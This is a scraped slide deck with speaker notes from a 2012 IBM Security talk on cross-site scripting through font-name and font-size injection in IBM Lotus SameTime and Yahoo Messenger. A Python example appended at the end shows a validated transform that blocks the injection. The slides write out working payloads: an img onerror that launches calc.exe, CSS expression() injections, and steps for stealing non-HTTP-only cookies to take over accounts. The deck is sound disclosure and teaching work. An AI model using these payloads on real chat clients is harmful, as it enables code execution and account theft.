WebRTC and SIP not just audio and video @ OpenSIPS 2024WebRTC and SIP not just audio and video @ OpenSIPS 2024
WebRTC and SIP not just audio and video @ OpenSIPS 2024
 
Cyber Insurance - RalphGilot - Embry-Riddle Aeronautical University.pptx
Cyber Insurance - RalphGilot - Embry-Riddle Aeronautical University.pptxCyber Insurance - RalphGilot - Embry-Riddle Aeronautical University.pptx
Cyber Insurance - RalphGilot - Embry-Riddle Aeronautical University.pptx
 
Vector Search @ sw2con for slideshare.pptx
Vector Search @ sw2con for slideshare.pptxVector Search @ sw2con for slideshare.pptx
Vector Search @ sw2con for slideshare.pptx
 
JavaScript Usage Statistics 2024 - The Ultimate Guide
JavaScript Usage Statistics 2024 - The Ultimate GuideJavaScript Usage Statistics 2024 - The Ultimate Guide
JavaScript Usage Statistics 2024 - The Ultimate Guide
 
Design and Development of a Provenance Capture Platform for Data Science
Design and Development of a Provenance Capture Platform for Data ScienceDesign and Development of a Provenance Capture Platform for Data Science
Design and Development of a Provenance Capture Platform for Data Science
 
JohnPollard-hybrid-app-RailsConf2024.pptx
JohnPollard-hybrid-app-RailsConf2024.pptxJohnPollard-hybrid-app-RailsConf2024.pptx
JohnPollard-hybrid-app-RailsConf2024.pptx
 
Introduction to use of FHIR Documents in ABDM
Introduction to use of FHIR Documents in ABDMIntroduction to use of FHIR Documents in ABDM
Introduction to use of FHIR Documents in ABDM
 

Stylish XSS

  • 1. © 2012 IBM Corporation, IBM Security Systems. Stylish XSS via Font Name Injection
  • 2. Background - Instant Messengers
  • 3. Background - Instant Messengers: <Text Style="font-family:Segoe UI; font-weight:bold; font-style:italic; color:#008000;">Hi!</Text>
  • 4. Background - Instant Messengers: Every time I've seen this screen, I wondered "What if I could use some HTML here..."
  • 5. Background - Windows Fonts: Windows accepts basically any character as part of the font name. Font name length is limited to ~30 chars.
  • 6. IBM Lotus SameTime Messenger: <span style="font-size:14pt;font-family:Segoe UI;font-weight:normal;font-style:normal;">You Do!</span>
  • 7. SameTime - Exploit - CSS. Font Name: expression(alert(1));
  • 8. SameTime - Exploit - CSS. Font Name: expression(alert(1)); Desired output: <span style=";font-family:expression(alert(1));..."> Actual output: <span style="">
  • 9. SameTime - Exploit - New Attribute. Font Name: "onclick="alert(1)" Desired output: <span style="font-size:9pt;font-family:" onclick="alert(1)" ..."> Actual output: <span style="font-size:9pt;font-family:" onclick="">
  • 10. SameTime - Exploit: ~50 Fonts Later
  • 11. SameTime - Exploit - Found. Message sent: <span style="...font-family: Message received: <span style="...font-family:
  • 12. SameTime - Exploit - Found. Message sent: <span style="...font-family:e0" <<style<style</style>img x='> Message received: <span style="...font-family:
  • 13. SameTime - Exploit - Found. Message sent: <span style="...font-family:e0" <<style<style</style>img x='> Message received: <span style="...font-family:e0"> <img x='>
  • 14. SameTime - Exploit - Found. Message sent: <span style="...font-family:e0" <<style<style</style>img x='>Rest of Orig CSS"> Message received: <span style="...font-family:e0"> <img x='>Rest of Orig CSS">
  • 15. SameTime - Exploit - Found. Message sent: <span style="...font-family:e0" <<style<style</style>img x='>Rest of Orig CSS">' src='x' onerror='location="c:\windows\system32\calc.exe" ' Message received: <span style="...font-family:e0"> <img x='>Rest of Orig CSS">
  • 16. SameTime - Exploit - Found. Message sent: <span style="...font-family:e0" <<style<style</style>img x='>Rest of Orig CSS">' src='x' onerror='location="c:\windows\system32\calc.exe" ' </span> Message received: <span style="...font-family:e0"> <img x='>Rest of Orig CSS">' src='x' onerror='location="c:\windows\system32\calc.exe" ' </span>
  • 17. SameTime – Remote Code Execution: <span style="font-size:14pt;font-family:e0"> <img x=';font-weight:normal;font-style:normal;">' src='x' onerror='location="c:\windows\system32\calc.exe"'</span>
  • 18. Yahoo Messenger
  • 19. Yahoo Messenger – Message View: Lots of colors, but that's about it...
  • 20. Yahoo Messenger - History View
  • 21. Yahoo Messenger - History View
  • 22. Yahoo Messenger - History View: Finally, Yahoo's purple alert!
  • 23. Yahoo Messenger - The Payload: <img src="x"onmouseover="alert(1)">
  • 24. Yahoo Messenger - Digging Deeper: Wait, what? It's not local?!
  • 25. Yahoo Messenger - Digging Deeper: Accessing this URL in Chrome yields the same result.
  • 26. Yahoo Messenger - Digging Deeper: That means I can read the cookie! And steal your account!
  • 27. Yahoo Messenger - Recap: 1. Send the victim a message that contains a malicious HTML snippet 2. Wait 3-4 hours for it to show up in the history 3. Convince the user to open his history, or send him a direct link to it (after all, it is not local) 4. Have the victim click "Instant Messages" in the drop-down box
  • 28. Yahoo Messenger - Introducing: Web Messenger! Finally I can see the results of my attacks in real time!
  • 29. Yahoo Messenger - Web Messenger: During the tests, I noticed that a <Font> tag sent as part of the message text is rendered differently in the Web Messenger. • The message: <font face="xxx" size="20">33333</font> • Was rendered as: <font style="font-size:20pt" face="xxx" id="yui_3_2_0_20_1330267588862427">33333</font>
  • 30. Yahoo Messenger - Exploiting CSS: Add a new rule with an expression() call.
  • 31. Yahoo Messenger - Exploiting CSS. Started with: <font face=ssss size="1&color:red">xxxx</font> To my surprise, the response came back as I hoped: <font style="font-size:1&amp;color:red">xxxx</font>
  • 32. Yahoo Messenger - Exploiting CSS. Next was the expression: <font face=sssss size="1&color:expression(alert(1))">xxxx</font> And again, it seems like nothing is filtering this... <font style="font-size:1&amp;color:expression(alert(1))">xxxx</font>
  • 33. Yahoo Messenger - Exploiting CSS: Time to open Internet Explorer!
  • 34. Yahoo Web Messenger - IE Version
  • 35. Yahoo Web Messenger - IE Version. The rules (for IE): 1. The size attribute must be surrounded by double quotes (" ") 2. The size value must be followed by the "pt;" suffix. <font size="15pt;"> becomes <font style="font-size=15pt;">
  • 36. Yahoo Web Messenger - IE Version: By tweaking the size value, a new font-family CSS rule could be injected. <font size="15pt;font-family:aaaa;"> becomes <font style="font-size=15pt;font-family: aaaa;">
  • 37. Yahoo Web Messenger - IE Version: With all that in mind, and ~30 <Font> tags later, came the following payload that bypasses the CSS filtering: <font size="15pt;font-family:expression(alert(1));">
  • 38. Yahoo Web Messenger - IE Version: It should work correctly according to the rendered source in IE Developer Tools
  • 39. Yahoo Web Messenger - IE Version: Yet somehow, no alert
  • 40. Yahoo Web Messenger - Uber Meta! After ~5 hours of more fiddling and long lonely IM chats with myself, I finally found what I was afraid of. Or in other words, the "No Expression For You" meta tag: <meta http-equiv="X-UA-Compatible" content="IE=8"/>
  • 41. Yahoo Web Messenger - Going Old School: Fired up my Windows XP VM and kicked out IE8
  • 42. Yahoo Web Messenger - Finally
  • 43. Yahoo Messenger - History Window
  • 44. Questions?

Editor's Notes

  1. Who am I? This presentation is going to show an idea I had and how I leveraged this idea into 3 vulnerabilities in the major IM clients, one of which will not be disclosed today because it was not yet patched. It will be published in our blog once it is patched.
  2. Explain how IMs work. Talk about: The message window is actually a browser. The user's text message is wrapped in an HTML\XML template containing the following fields. The message is sent and then rendered as HTML\XML in the client's browser. It accepts parameters dictating: color, font name, font weight, font style and more. Let's talk about IMs and set aside for a moment all the video, sound and file-transfer functionality and so on, keeping only the aspect of sending messages. If we try to map the ways we can send input to the system, we arrive at something like this example.
  4. To configure all these settings, these apps usually come with a screen like this one. Every time I've seen this screen, I wondered "what if I could use some HTML here..."
  5. And apparently, you can! Windows fonts: all chars are valid; max 30 chars in every font name.
  6. Explain that the font we change goes into this template and is then sent out. Talk about the possibilities for exploits: 1. Expression 2. Get out of the span tag 3. Get out to the HTML main context
  7. Starting off with expression
  8. The server actually filtered everything in the CSS
  9. Moving to the next payload: getting out of the style attr and getting into a new onclick attr. Results in the onclick being empty. No good.
  10. Two fields attack. First field (Font Name): 1. Filter deletes the <style<style</style part 2. We are left with e0"><img x='..., which opens a new IMG tag with an X attribute (using a single quote). Second field (Message Text): 1. Closes the X attribute (it contains all the rest of the real CSS) 2. Adds a SRC attribute 3. Adds an ONERROR attribute relocating the window to an EXE/BAT file 4. File will be executed
  16. Second line shows the trapped CSS in the X parameter. Calc executed example.
  17. Yahoo. No history found in the local FS, meaning the template is unknown. Messages sent take about 3-4 hours until they register in the History. That means that every time I wanted to test anything, I had to wait 3-4 hours for the results and only then tweak my payloads and resend everything...
  18. Message view seems to sanitize input well; all messages sent managed to do nothing more than pretty colors. Taking into account the fact that every test takes 3 hours, I decided it's best to move on and open the History.
  19. Looks a bit better but still, nothing interesting…
  20. The next step I took was to change the history filter to “Instant Messages”
  21. Boom. Endless pop-ups popped up... Apparently a lot of my tests worked...
  22. I isolated the simplest payload that worked, and we can now move on and get some info such as: user agent, privileges, etc...
  23. Digging deeper got us the browser type (IE) and the location of the page, which is an internet address
  24. So I tried accessing this page using Chrome, and as long as I was logged in to Yahoo! it got me the same results!
  25. The next thing I found was the cookie. Apparently, Yahoo doesn't like to use HTTP-only cookies, so stealing the cookie actually means stealing the account!
  26. Send message. Wait 3-4h. Social engineer the user into opening the History. Have the user click on the Instant Messages context menu.
  27. No more 3 hour tests. I can now send a message and see it on the web messenger immediately. I now know the template.
  28. I sent the first line of code; the web messenger rendered the second line of code. Changes: Added a new ID attribute – we don't care! Transformed the Size attribute into a CSS font-size attribute – very interesting!
  29. First, I tried to inject a new color:red sentence, using the & -> &amp; encoding in order to terminate the CSS rule and inject a new one. And that worked without a glitch.
  30. Tried the same with an expression call, and all seems well.
  31. Opening IE. But no alert... After digging a little deeper
  32. Different sanitizer per browser. Found an older message that has a similar behavior. Worked on that example until I found some guidelines for the transformation on IE.
  33. Talk about the two rules of transformation
  34. Using these guidelines I attempted a new rule injection
  35. Payload found – new rule injected Explain the CSS encoding trick
  36. Everything looks good in IE
  37. Somehow, no alert
  38. Goddamn meta tag. But this meta tag doesn't work in IE<8
  39. VM. Kick off IE8
  40. Entered the same URL with IE 7 and the alert shows up
  41. Also in the original History view of the messenger, which actually uses the installed IE
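
Notes 28 through 35 describe the Yahoo Web Messenger side: the size= attribute of a <font> tag is turned into a CSS font-size declaration, the value is HTML-entity encoded on the way, and that encoding is the wrong layer, because the HTML parser decodes entities before the CSS engine ever sees the attribute. The example below is added here and is not Yahoo's code or the deck's; it reconstructs a transform of that shape from the slides, shows what the CSS parser actually receives, and puts a validated transform beside it that only accepts an integer point size. The inputs are the deck's own size values, constructed here as test data. The deck also shows that the IE=8 document mode suppressed expression() while IE7 did not, which is why the fix belongs in the transform rather than in a browser setting.

```python
import html
import re

# Constructed inputs: the size values the deck reports sending to the Yahoo Web
# Messenger (slides 29, 31, 32 and 37).
SIZE_VALUES = {
    "legit": "20",
    "new_rule": "1&color:red",
    "expression": "1&color:expression(alert(1))",
    "ie_payload": "15pt;font-family:expression(alert(1));",
}

def entity_encoding_transform(size_attr):
    """Transform shaped like the one the slides show: size= is entity-encoded and
    written into a style attribute as font-size.  Reconstructed for this example,
    not Yahoo's code."""
    return '<font style="font-size:%s">' % html.escape(size_attr, quote=True)

def css_seen_by_parser(tag):
    """The CSS engine gets the attribute value after the HTML parser has decoded
    entities, so &amp; is already & again by the time the CSS is tokenised."""
    m = re.search(r'style="([^"]*)"', tag)
    return html.unescape(m.group(1)) if m else ""

def declarations(css):
    """Minimal prop:value splitter on ';' (enough to show a second declaration
    riding in on a value that was meant to be a number)."""
    out = []
    for decl in css.split(";"):
        if ":" in decl:
            prop, value = decl.split(":", 1)
            out.append((prop.strip(), value.strip()))
    return out

SIZE_RE = re.compile(r"[0-9]{1,2}")

def validated_transform(size_attr):
    """Hardened transform: the size must be a one or two digit integer, clamped
    to a sane range; anything else gets the default.  Only one declaration can
    ever result, whatever the input contains."""
    pt = int(size_attr) if SIZE_RE.fullmatch(size_attr) else 12
    pt = min(max(pt, 6), 72)
    return '<font style="font-size:%dpt">' % pt

if __name__ == "__main__":
    for label, value in SIZE_VALUES.items():
        before = declarations(css_seen_by_parser(entity_encoding_transform(value)))
        after = declarations(css_seen_by_parser(validated_transform(value)))
        print(label, "entity-encoded:", before, "validated:", after)
```

Run stand-alone, the slide 31 value reproduces the `font-size:1&amp;color:red` attribute the deck shows, which decodes back to `font-size:1&color:red` for the CSS engine, and the slide 37 value yields two declarations from the entity-encoding transform, the second being the injected font-family rule; the validated transform yields one declaration in every case. Entity encoding is the right tool for the HTML attribute boundary and nothing else; the CSS value boundary needs its own check, and for a numeric property that check is a number.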